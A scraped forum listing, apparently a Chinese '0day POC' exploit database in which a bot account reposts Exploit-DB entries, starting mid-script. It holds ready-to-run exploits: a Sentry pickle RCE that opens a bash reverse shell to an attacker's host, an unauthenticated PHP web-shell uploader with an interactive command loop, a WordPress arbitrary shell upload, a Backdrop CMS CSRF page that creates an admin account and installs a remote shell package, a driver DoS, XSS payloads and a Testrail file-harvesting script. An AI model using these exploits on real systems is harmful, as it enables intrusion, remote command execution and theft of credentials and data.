Exception("Failed to POST to the URL provided", e) start = request.text.find("START") end = request.text.find("END") file = request.text[start + 5:end].strip() try: file = b64decode(file) file = file.decode("ascii").strip() except: raise Exception("File not found") print(file) def run(self): self.create_resume() self.update_resume() id = self.get() self.post(id) CVE_2019_13358().run()
  10. ISHACK AI BOT

    Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected) # Date: 10.06.2021 # Exploit Author: Akıner Kısa # Vendor Homepage: https://cloudron.io # Software Link: https://www.cloudron.io/get.html # Version: 6.3 > # CVE : CVE-2021-40868 Proof of Concept: 1. Go to https://localhost/login.html?returnTo= 2. Type your payload after returnTo= 3. Fill in the login information and press the sign in button.
  11. ISHACK AI BOT

    Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated) # Date: 22/09/2021 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vulnerability Discovered By : Clement Berthaux (SYNACKTIV) # Software Link: https://sentry.io/welcome/ # Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf # Tested on: Sentry 8.0.0 # Fixed Versions : 8.1.4 , 8.2.2 # NOTE : Only exploitable by a user with Superuser privileges. # Example Usage : https://imgur.com/a/4w5rH5s import requests import re import warnings from bs4 import BeautifulSoup import sys import base64 import urllib import argparse import os import time from cPickle import dumps import subprocess from base64 import b64encode from zlib import compress from shlex import split from datetime import datetime parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE') parser.add_argument('-U',help='Sentry Admin Username / Email') parser.add_argument('-P',help='Sentry Admin Password') parser.add_argument('-l',help='Rev Shell LHOST') parser.add_argument('-p',help='Rev Shell LPORT ',type=int) parser.add_argument('--url',help='Sentry Login URL ') args = parser.parse_args() username = args.U password = args.P lhost = args.l lport = args.p sentry_url = args.url # Generate Payload class PickleExploit(object): def __init__(self, command_line): self.args = split(command_line) def __reduce__(self): return (subprocess.Popen, (self.args,)) rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport) payload = b64encode(compress(dumps(PickleExploit(rev_shell)))) print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell)) print("[+] Encoded Payload : %s" %(payload)) # Perform Exploitation warnings.filterwarnings("ignore", category=UserWarning, module='bs4') request = requests.Session() print("[+] Retrieving CSRF token to submit the login form") print("[+] URL : %s" %(sentry_url)) time.sleep(1) page = request.get(sentry_url) html_content = page.text soup = BeautifulSoup(html_content,features="lxml") token = soup.findAll('input')[0].get("value") print("[+] CSRF Token : "+token) time.sleep(1) #Login proxies = { "http" : "http://127.0.0.1:8080", "https" : "https://127.0.0.1:8080", } login_info ={ "csrfmiddlewaretoken": token, "op": "login", "username": username, "password": password } login_request = request.post(sentry_url,login_info) if login_request.status_code==200: print("[+] Login Successful") time.sleep(1) else: print("Login Failed") print(" ") sys.exit() #get admin page split_url = sentry_url.split("/")[2:] main_url = "http://"+split_url[0] audit_url = main_url+"/admin/sentry/auditlogentry/add/" #request auditpage date = datetime.today().strftime('%Y-%m-%d') time = datetime.today().strftime('%H:%M:%S') exploit_fields = { "csrfmiddlewaretoken" : request.cookies['csrf'], "organization" : "1", "actor_label" : "root@localhost", "actor" : "1", "actor_key" : " ", "target_object" : "2", "target_user" : " ", "event" : "31", "ip_address" : "127.0.0.1", "data" : payload, "datetime_0" : date, "datetime_1" : time, "initial-datetime_0" : date, "initial-datetime_1" : time, "_save" : "Save" } print("[+] W00t W00t Sending Shell :) !!!") stager = request.post(audit_url,exploit_fields) if stager.status_code==200: print("[+] Check nc listener!") else: print("Something Went Wrong or Not Vulnerable :(")
  12. ISHACK AI BOT

    Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 ORS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Reviewer System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'personImage': ( 'kh4waja.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d', 'answer':'A', 'btnAddQuestion':'Save' } filename = 'kh4waja.php' #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data) shell_upload = True if("" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  13. ISHACK AI BOT

    Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control # Date: 22/09/2022 # Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii) # Vendor Homepage: https://www.gurock.com/testrail/ # Version: 7.2.0.3014 and below # Tested on: macOS, Linux, Windows # CVE : CVE-2021-40875 # Reference: https://johnjhacking.com/blog/cve-2021-40875/ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. # Method 1 #!/bin/bash # Author: sickcodes & johnjhacking # Contact: https://twitter.com/sickcodes # https://github.com/SakuraSamuraii/derailed # Copyright: sickcodes (C) 2021 # License: GPLv3+ # stop null byte error while curling shopt -s nullglob ! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; } TARGET="${1}" wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt FILE_LIST="${PWD}/files.md5.txt" mkdir -p ./output cd ./output touch ./accessible.log # option to get a fresh updated files.md5, if it comes in a future version # curl "${TARGET}/files.md5" > ./files.md5 while read -r HASH SUFFIX; do echo "${SUFFIX}" TESTING_URL="${TARGET}/${SUFFIX}" echo "========= ${TESTING_URL} =========" # Ignore list, some of these files MAY be world readable, # if the organisation has modified permissions related # to the below files otherwise, they are ignored. case "${SUFFIX}" in *'.php' ) continue ;; *'.html' ) continue ;; *'LICENSE' ) continue ;; *'README.md' ) continue ;; *'.js' ) continue ;; *'.svg' ) continue ;; *'.gif' ) continue ;; *'.png' ) continue ;; *'.css' ) continue ;; *'.exe' ) continue ;; # *'.add_your_own' ) continue # ;; esac # peek at page response # doesn't work because gurock returns 200 and prints the error in plaintext # curl -s -I -X POST "${TESTING_URL}" # feth the page, following redirects, to a variable OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" # find matching disqualifying pharses in the page contents # and pass any pages that are "denied access" or "direct script access" case "${OUTPUT_DATA}" in *'No direct script'* ) continue ;; *'Directory Listing Denied'* ) continue ;; esac # save all interesting pages, without forward slashes # https://www.target/ # will be saved as: # https:::www.target <http://www.target>: tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" # print to stdout, and also append to ./accessible.log the successful saves tee -a ./accessible.log <<< "${TESTING_URL}" done < "${FILE_LIST}" ### Results in your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below
  14. ISHACK AI BOT

    Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/3dprint-lite/ # Date: 22/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/ # Version: <= 1.9.1.4 # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload") print("Author -> spacehen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("jsonrpc" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'p3dlite_handle_upload' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'file' : open(file_path)} print("Uploading Shell..."); response = requests.post(uri, files=files) file_name = path.basename(file_path) if(file_name in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + "wp-content/uploads/p3d/" + file_name); else: print("Shell Upload Failed") sys.exit(1) main();
  15. ISHACK AI BOT

    WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) # Date: 15/2/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/woo-order-export-lite/ # Version: 3.1.7 # Tested on: Windows 10 # CVE: CVE-2021-24169 1. Description: This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
  16. ISHACK AI BOT

    Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) # Date: 27/08/2021 # Exploit Author: Quadron Research Lab # Version: all version # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.redragonzone.com/pages/download # Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE import ctypes, sys from ctypes import * import io from itertools import product from sys import argv devicename = "REDRAGON_MOUSE" ioctl = 0x222414 kernel32 = windll.kernel32 hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print ("Not Win! Sorry!") else: print ("OPENED!") buf = '\x44' * 1000 + '\x00' * 1000 bufLength = 2000 kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
  17. ISHACK AI BOT

    Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Exploit Author: V1n1v131r4 # Date: 2021-09-22 # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip # Version: 1.20.0 # Tested On: Kali Linux, Ubuntu 20.04 # Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers. # Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file. <html> <body> <form method="POST" action="http://example.com/backdrop/?q=admin/people/create"> <input type="text" name="q" value="admin/people/create"> <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8"> <input type="text" name="name" value="hacker"> <input type="text" name="mail" value="[email protected]"> <input type="text" name="notify" value="1"> <input type="text" name="pass" value="admin"> <input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY"> <input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I"> <input type="text" name="form_id" value="user_register_form"> <input type="text" name="status" value="1"> <input type="text" name="roles[administrator]" value="administrator"> <input type="text" name="op" value="Create new account"> <input type="submit" value="Send"> </form> </body> </html> # Step 1 # Send this page below to the victim <html> <body> <form method="POST" action="http://example.com/backdrop/?q=system/ajax"> <input type="text" name="q" value="system/ajax"> <input type="text" name="Backdrop.tableDrag.showWeight" value="0"> <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8"> <input type="text" name="bulk" value=""> <input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar"> <input type="text" name="files[project_upload]" value=""> <input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA"> <input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw"> <input type="text" name="form_id" value="installer_manager_install_form"> <input type="text" name="_triggering_element_name" value="op"> <input type="text" name="_triggering_element_value" value="Install"> <input type="text" name="ajax_html_ids[]" value="skip-link"> <input type="text" name="ajax_html_ids[]" value="main-content"> <input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form"> <input type="text" name="ajax_html_ids[]" value="edit-search-text"> <input type="text" name="ajax_html_ids[]" value="edit-submit"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-ajax"> <input type="text" name="ajax_html_ids[]" value="title-link"> <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib"> <input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link"> <input type="text" name="ajax_html_ids[]" value="edit-link"> <input type="text" name="ajax_html_ids[]" value="admin-bar"> <input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper"> <input type="text" name="ajax_html_ids[]" value="admin-bar-icon"> <input type="text" name="ajax_html_ids[]" value="admin-bar-menu"> <input type="text" name="ajax_html_ids[]" value="admin-bar-extra"> <input type="text" name="ajax_html_ids[]" value="admin-bar-search-items"> <input type="text" name="ajax_html_ids[]" value="ui-id-1"> <input type="text" name="ajax_html_ids[]" value="backdrop-modal"> <input type="text" name="ajax_html_ids[]" value="installer-manager-install-form"> <input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-bulk"> <input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-project-url"> <input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper"> <input type="text" name="ajax_html_ids[]" value="edit-project-upload"> <input type="text" name="ajax_html_ids[]" value="edit-actions"> <input type="text" name="ajax_html_ids[]" value="edit-submit--2"> <input type="text" name="ajax_page_state[theme]" value="seven"> <input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo"> <input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1"> <input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1"> <input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1"> <input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1"> <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1"> <input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1"> <input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1"> <input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1"> <input type="submit" value="Send"> </form> </body> </html> Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
  18. ISHACK AI BOT

    WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
